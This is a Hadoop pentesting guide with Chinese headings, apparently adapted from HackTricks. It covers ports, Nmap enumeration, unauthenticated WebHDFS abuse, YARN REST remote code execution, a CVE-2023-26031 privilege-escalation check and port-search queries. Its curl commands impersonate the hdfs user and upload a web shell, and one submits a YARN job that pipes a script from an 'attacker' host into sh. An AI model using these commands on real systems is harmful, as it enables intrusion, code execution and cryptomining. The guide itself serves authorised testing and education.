---
title: "50030 - Hadoop"
weight: 50030-50060-50070-50075-50090
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **学习提示**: 本文档介绍 **50030-50060-50070-50075-50090 - Hadoop** 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

---

> ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

## 50030-50060-50070-50075-50090 - 渗透测试 Hadoop

### **基本信息**

**Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing.

Useful default ports:

- **50070 / 9870** NameNode (WebHDFS)
- **50075 / 9864** DataNode
- **50090** Secondary NameNode
- **8088** YARN ResourceManager web UI & REST
- **8042** YARN NodeManager
- **8031/8032** YARN RPC (often forgotten and still unauth in many installs)

Unfortunatelly Hadoop lacks support in the Metasploit framework at the time of documentation. However, you can use the following **Nmap scripts** to enumerate Hadoop services:

- **`hadoop-jobtracker-info (端口 50030)`**
- **`hadoop-tasktracker-info (端口 50060)`**
- **`hadoop-namenode-info (端口 50070)`**
- **`hadoop-datanode-info (端口 50075)`**
- **`hadoop-secondary-namenode-info (端口 50090)`**

It's crucial to note that **Hadoop operates without authentication in its default setup**. However, for enhanced security, configurations are available to integrate Kerberos with HDFS, YARN, and MapReduce services.

### WebHDFS / HttpFS abuse (50070/9870 or 14000)

When **security=off** you can impersonate any user with the `user.name` parameter. Some quick primitives:

```bash
## list root directory
curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

## read arbitrary file from HDFS
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"

## upload a web shell / binary
curl -X PUT -T ./payload "http://<host>:50070/webhdfs/v1/tmp/payload?op=CREATE&overwrite=true&user.name=hdfs" -H 'Content-Type: application/octet-stream'
```

If HttpFS is enabled (default port **14000**) the same REST paths apply. Behind Kerberos you can still use `curl --negotiate -u :` with a valid ticket.

### YARN unauth 远程代码执行 (8088)

The **ResourceManager REST API** accepts job submissions with no auth in default “simple” mode (`dr.who`). Attackers abuse it to run arbitrary commands (e.g. miners) without needing HDFS write access.

```bash
## 1) get an application id
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application

## 2) submit DistributedShell pointing to a command
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
  -H 'Content-Type: application/json' \
  -d '{
    "application-id":"application_1234567890000_0001",
    "application-name":"pwn",
    "am-container-spec":{
      "commands":{"command":"/bin/bash -c \"curl http://attacker/p.sh|sh\""}
    },
    "application-type":"YARN"
  }'
```

If port **8031/8032 RPC** is exposed, older clusters allow the same job submission over protobuf without auth (documented in several cryptominer campaigns) – treat those ports as 远程代码执行 as well.

### Local PrivEsc from YARN containers (CVE-2023-26031)

Hadoop 3.3.1–3.3.4 **container-executor** loads libs from a **relative RUNPATH**. A user who can run YARN containers (including remote submitters on insecure clusters) may drop a malicious `libcrypto.so` in a writable path and get **root** when `container-executor` runs with SUID.

Quick check:

```bash
readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
## vulnerable if it contains $ORIGIN/:../lib/native/
ls -l /opt/hadoop/bin/container-executor   # SUID+root makes it exploitable
```

Fixed in **3.3.5**; ensure the binary is not SUID if secure containers aren’t required.

---


### 搜索引擎语法

#### FOFA

```bash
# FOFA 搜索语法
port="50030"
```

#### Shodan

```bash
# Shodan 搜索语法
port:50030
```

#### ZoomEye

```bash
# ZoomEye 搜索语法
port:50030
```

---

## 📖 参考资料

- [HackTricks - 50030-hadoop](https://book.hacktricks.wiki/en/network-services-pentesting/50030-hadoop.html)

